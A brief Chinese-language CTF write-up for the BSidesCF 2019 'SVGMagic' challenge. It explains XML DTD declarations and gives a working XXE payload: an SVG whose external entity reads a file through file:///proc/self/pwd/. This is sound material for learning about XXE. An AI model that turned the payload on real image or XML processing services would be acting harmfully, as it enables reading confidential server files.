[BSidesCF 2019]SVGMagic

# [BSidesCF 2019]SVGMagic

0x01.涉及知识点：

• XXE
• file:///proc/self/pwd/为当前目录

0x02.知识学习

参考连接：xxe漏洞的学习与利用总结

XML结构：

DTD(文档类型定义)

1. 内部声明： ex: <!DOCTYOE test any>

   <?xml version="1.0"?>
   <!DOCTYPE note [
     <!ELEMENT note (to,from,heading,body)>
     <!ELEMENT to      (#PCDATA)>
     <!ELEMENT from    (#PCDATA)>
     <!ELEMENT heading (#PCDATA)>
     <!ELEMENT body    (#PCDATA)>
   ]>
   <note>
     <to>George</to>
     <from>John</from>
     <heading>Reminder</heading>
     <body>Don't forget the meeting!</body>
   </note>
   

2. 外部声明（引用外部DTD）： ex:<!DOCTYPE test SYSTEM 'http://www.test.com/evil.dtd'>

   <?xml version="1.0"?>
   <!DOCTYPE note SYSTEM "note.dtd">
   <note>
   <to>George</to>
   <from>John</from>
   <heading>Reminder</heading>
   <body>Don't forget the meeting!</body>
   </note>
   

   而note.dtd的内容为:

   <!ELEMENT note (to,from,heading,body)>
   <!ELEMENT to (#PCDATA)>
   <!ELEMENT from (#PCDATA)>
   <!ELEMENT heading (#PCDATA)>
   <!ELEMENT body (#PCDATA)>
   
   

0x03解题

payload:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///proc/self/pwd/flag.txt" >]>
<svg width="512px" height="190px" viewBox="0 0 512 190" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" preserveAspectRatio="xMidYMid">
    <g>
		<text x="0" y="15" fill="red">&xxe;</text>
	</g>
</svg>